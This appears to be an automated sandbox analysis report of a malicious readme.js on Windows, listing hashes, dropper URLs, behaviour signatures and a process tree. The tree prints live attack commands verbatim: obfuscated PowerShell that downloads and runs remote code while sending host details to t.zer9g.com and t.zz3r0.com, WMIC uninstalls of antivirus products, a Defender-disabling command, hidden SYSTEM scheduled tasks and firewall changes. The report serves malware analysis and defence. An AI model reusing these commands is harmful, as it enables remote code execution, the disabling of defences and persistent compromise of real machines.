9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719

Analysis

max time kernel
57s
max time network
142s
platform
windows10_x64
resource
win10v20201028
submitted
18-02-2021 18:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

readme.js
Size

9KB
MD5

e294d6f427c64f77b5b61bb7b17dd12c
SHA1

ccdae3ada854cc441106ec52c12823439bab6cba
SHA256

9cf63310788e97f6e08598309cbbf19960162123e344df017b066ca8fcbed719
SHA512

2c974b0969e4d9b3d1ded364c0a6033e827f0a4890730b9b062c76b690425f8fefc90aa8c9e6dfc599a7909e18a949c6a4b2d4b5dd5787a3bbac0834e70fe82a

Score

10^/10

evasion

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zz3r0.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.zer9g.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://t.bb3u9.com

Signatures

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

flow pid process

8 1540 powershell.exe
32 5072 powershell.EXE
34 4976 powershell.EXE
36 4976 powershell.EXE
Executes dropped EXE 3 IoCs

Processes:

ye9zMSruN.exeye9zMSruN.exeye9zMSruN.exe

pid process

4732 ye9zMSruN.exe
4844 ye9zMSruN.exe
5016 ye9zMSruN.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

flow	pid	process
8	1540	powershell.exe
32	5072	powershell.EXE
34	4976	powershell.EXE
36	4976	powershell.EXE

pid	process
4732	ye9zMSruN.exe
4844	ye9zMSruN.exe
5016	ye9zMSruN.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	powershell.EXE
File created	C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe	powershell.EXE
File opened for modification	C:\Windows\System32\Windowspowershell\V1.0\ye9zMSruN.exe	powershell.EXE

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

4932 4360 WerFault.exe powershell.EXE
2748 4976 WerFault.exe powershell.EXE
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4136 schtasks.exe
4820 schtasks.exe
4620 schtasks.exe
3780 schtasks.exe
2156 schtasks.exe
3364 schtasks.exe

pid	pid_target	process	target process
4932	4360	WerFault.exe	powershell.EXE
2748	4976	WerFault.exe	powershell.EXE

pid	process
4136	schtasks.exe
4820	schtasks.exe
4620	schtasks.exe
3780	schtasks.exe
2156	schtasks.exe
3364	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEye9zMSruN.exeye9zMSruN.exepowershell.EXEye9zMSruN.exepowershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ye9zMSruN.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	ye9zMSruN.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	ye9zMSruN.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	ye9zMSruN.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

notepad.exe

pid process

1512 notepad.exe

pid	process
1512	notepad.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

Processes:

powershell.exepowershell.exepowershell.EXEWerFault.exepowershell.EXEpowershell.EXEWerFault.exeye9zMSruN.exeye9zMSruN.exeye9zMSruN.exe

pid	process
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe
3116	powershell.exe
3116	powershell.exe
3116	powershell.exe
4360	powershell.EXE
4360	powershell.EXE
4360	powershell.EXE
4360	powershell.EXE
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
4932	WerFault.exe
5072	powershell.EXE
5072	powershell.EXE
5072	powershell.EXE
5072	powershell.EXE
4976	powershell.EXE
4976	powershell.EXE
4976	powershell.EXE
4976	powershell.EXE
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
2748	WerFault.exe
4732	ye9zMSruN.exe
4732	ye9zMSruN.exe
4732	ye9zMSruN.exe
4844	ye9zMSruN.exe
4844	ye9zMSruN.exe
5016	ye9zMSruN.exe
5016	ye9zMSruN.exe
4732	ye9zMSruN.exe
4844	ye9zMSruN.exe
5016	ye9zMSruN.exe
4844	ye9zMSruN.exe
5016	ye9zMSruN.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeSystemEnvironmentPrivilege	1540	powershell.exe
Token: SeRemoteShutdownPrivilege	1540	powershell.exe
Token: SeUndockPrivilege	1540	powershell.exe
Token: SeManageVolumePrivilege	1540	powershell.exe
Token: 33	1540	powershell.exe
Token: 34	1540	powershell.exe
Token: 35	1540	powershell.exe
Token: 36	1540	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeSystemEnvironmentPrivilege	1540	powershell.exe
Token: SeRemoteShutdownPrivilege	1540	powershell.exe
Token: SeUndockPrivilege	1540	powershell.exe
Token: SeManageVolumePrivilege	1540	powershell.exe
Token: 33	1540	powershell.exe
Token: 34	1540	powershell.exe
Token: 35	1540	powershell.exe
Token: 36	1540	powershell.exe
Token: SeDebugPrivilege	3116	powershell.exe
Token: SeIncreaseQuotaPrivilege	3768	WMIC.exe
Token: SeSecurityPrivilege	3768	WMIC.exe
Token: SeTakeOwnershipPrivilege	3768	WMIC.exe
Token: SeLoadDriverPrivilege	3768	WMIC.exe
Token: SeSystemProfilePrivilege	3768	WMIC.exe
Token: SeSystemtimePrivilege	3768	WMIC.exe
Token: SeProfSingleProcessPrivilege	3768	WMIC.exe
Token: SeIncBasePriorityPrivilege	3768	WMIC.exe
Token: SeCreatePagefilePrivilege	3768	WMIC.exe
Token: SeBackupPrivilege	3768	WMIC.exe
Token: SeRestorePrivilege	3768	WMIC.exe
Token: SeShutdownPrivilege	3768	WMIC.exe
Token: SeDebugPrivilege	3768	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3768	WMIC.exe
Token: SeRemoteShutdownPrivilege	3768	WMIC.exe
Token: SeUndockPrivilege	3768	WMIC.exe
Token: SeManageVolumePrivilege	3768	WMIC.exe
Token: 33	3768	WMIC.exe
Token: 34	3768	WMIC.exe
Token: 35	3768	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

wscript.execmd.exepowershell.execmd.exeschtasks.execmd.execmd.execmd.execmd.execmd.exepowershell.EXEcmd.exe

description	pid	process	target process
PID 3920 wrote to memory of 856	3920	wscript.exe	cmd.exe
PID 3920 wrote to memory of 856	3920	wscript.exe	cmd.exe
PID 856 wrote to memory of 1512	856	cmd.exe	notepad.exe
PID 856 wrote to memory of 1512	856	cmd.exe	notepad.exe
PID 856 wrote to memory of 1540	856	cmd.exe	powershell.exe
PID 856 wrote to memory of 1540	856	cmd.exe	powershell.exe
PID 1540 wrote to memory of 200	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 200	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 3116	1540	powershell.exe	powershell.exe
PID 1540 wrote to memory of 3116	1540	powershell.exe	powershell.exe
PID 1540 wrote to memory of 2964	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 2964	1540	powershell.exe	cmd.exe
PID 2964 wrote to memory of 3200	2964	cmd.exe	WMIC.exe
PID 2964 wrote to memory of 3200	2964	cmd.exe	WMIC.exe
PID 1540 wrote to memory of 3364	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 3364	1540	powershell.exe	schtasks.exe
PID 3364 wrote to memory of 3768	3364	schtasks.exe	WMIC.exe
PID 3364 wrote to memory of 3768	3364	schtasks.exe	WMIC.exe
PID 1540 wrote to memory of 2112	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 2112	1540	powershell.exe	cmd.exe
PID 2112 wrote to memory of 1264	2112	cmd.exe	WMIC.exe
PID 2112 wrote to memory of 1264	2112	cmd.exe	WMIC.exe
PID 1540 wrote to memory of 68	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 68	1540	powershell.exe	cmd.exe
PID 68 wrote to memory of 2696	68	cmd.exe	cmd.exe
PID 68 wrote to memory of 2696	68	cmd.exe	cmd.exe
PID 1540 wrote to memory of 3484	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 3484	1540	powershell.exe	cmd.exe
PID 3484 wrote to memory of 4056	3484	cmd.exe	WMIC.exe
PID 3484 wrote to memory of 4056	3484	cmd.exe	WMIC.exe
PID 1540 wrote to memory of 3444	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 3444	1540	powershell.exe	cmd.exe
PID 3444 wrote to memory of 3700	3444	cmd.exe	WMIC.exe
PID 3444 wrote to memory of 3700	3444	cmd.exe	WMIC.exe
PID 1540 wrote to memory of 2132	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 2132	1540	powershell.exe	cmd.exe
PID 2132 wrote to memory of 2200	2132	cmd.exe	WMIC.exe
PID 2132 wrote to memory of 2200	2132	cmd.exe	WMIC.exe
PID 1540 wrote to memory of 2988	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 2988	1540	powershell.exe	cmd.exe
PID 1540 wrote to memory of 3364	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 3364	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4136	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4136	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4340	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4340	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4820	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4820	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 5052	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 5052	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4620	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4620	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4956	1540	powershell.exe	schtasks.exe
PID 1540 wrote to memory of 4956	1540	powershell.exe	schtasks.exe
PID 5072 wrote to memory of 4560	5072	powershell.EXE	cmd.exe
PID 5072 wrote to memory of 4560	5072	powershell.EXE	cmd.exe
PID 5072 wrote to memory of 4608	5072	powershell.EXE	cmd.exe
PID 5072 wrote to memory of 4608	5072	powershell.EXE	cmd.exe
PID 5072 wrote to memory of 4632	5072	powershell.EXE	cmd.exe
PID 5072 wrote to memory of 4632	5072	powershell.EXE	cmd.exe
PID 4560 wrote to memory of 4728	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 4728	4560	cmd.exe	cmd.exe
PID 4560 wrote to memory of 4732	4560	cmd.exe	ye9zMSruN.exe
PID 4560 wrote to memory of 4732	4560	cmd.exe	ye9zMSruN.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\readme.js
1⤵
- Suspicious use of WriteProcessMemory
PID:3920

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b notepad C:\Users\Admin\AppData\Local\Temp\readme.js & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
2⤵
- Suspicious use of WriteProcessMemory
PID:856

C:\Windows\system32\notepad.exe
notepad C:\Users\Admin\AppData\Local\Temp\readme.js
3⤵
- Opens file in notepad (likely ransom note)
PID:1512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('http://t.z'+'er9g.com/7p.php?0.7*mail_js*Admin*MKLUFVRL*'+[Environment]::OSVersion.version.Major);bpu ('http://t.z'+'er9g.com/mail.jsp?js_0.7')
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c echo Set-MpPreference -DisableRealtimeMonitoring 1
4⤵
PID:200

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
5⤵
PID:3200

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
4⤵
PID:3364

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:3768

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:2112

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
5⤵
PID:1264

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:68

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
5⤵
PID:2696

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:3484

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
5⤵
PID:4056

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:3444

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
5⤵
PID:3700

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
4⤵
- Suspicious use of WriteProcessMemory
PID:2132

C:\Windows\System32\Wbem\WMIC.exe
wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
5⤵
PID:2200

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe /verysilent /suppressmsgboxes /norestart
4⤵
PID:2988

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 120 /tn blackball /F /tr blackball
4⤵
- Creates scheduled task(s)
- Suspicious use of WriteProcessMemory
PID:3364

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn \zE1gPp /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:4136

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn \zE1gPp
4⤵
PID:4340

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn ycgz21vl\vn2exu8wFSI /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:4820

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn ycgz21vl\vn2exu8wFSI
4⤵
PID:5052

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /ru system /sc MINUTE /mo 60 /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS /F /tr "powershell -w hidden -c PS_CMD"
4⤵
- Creates scheduled task(s)
PID:4620

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /run /tn MicroSoft\Windows\uD5X7oWL\GsAVTRS
4⤵
PID:4956

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c netsh.exe firewall add portopening tcp 65529 SDNSd
4⤵
PID:3568

C:\Windows\system32\netsh.exe
netsh.exe firewall add portopening tcp 65529 SDNSd
5⤵
PID:2200

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
4⤵
PID:3244

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny445 dir=in protocol=tcp localport=445 action=block
4⤵
PID:4928

C:\Windows\system32\netsh.exe
"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=deny135 dir=in protocol=tcp localport=135 action=block
4⤵
PID:4416

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa2 /F
4⤵
PID:3700

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa1 /F
4⤵
PID:4984

C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /delete /tn Rtsa /F
4⤵
PID:4524

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('2mWo17uXvG1BXpmdgv8v/3NTmnNubHtV62fWrk4jPFI9wM3NN2vzTzticIYHlm7K3r2mT/YR0WDciL818pLubLgum30r0Rkwc8ZSAc3nxzR4iqef4hLNeUCnkWqulY5C0M85bjDLCpjblz/2LpUQcv1j1feIY6R7rpfqOLdHa10=');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='http://'+'t.zz3'+'r0.com';a($url+'/a.jsp?mail_20210218?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4360

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 4360 -s 2484
2⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
PID:4932

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
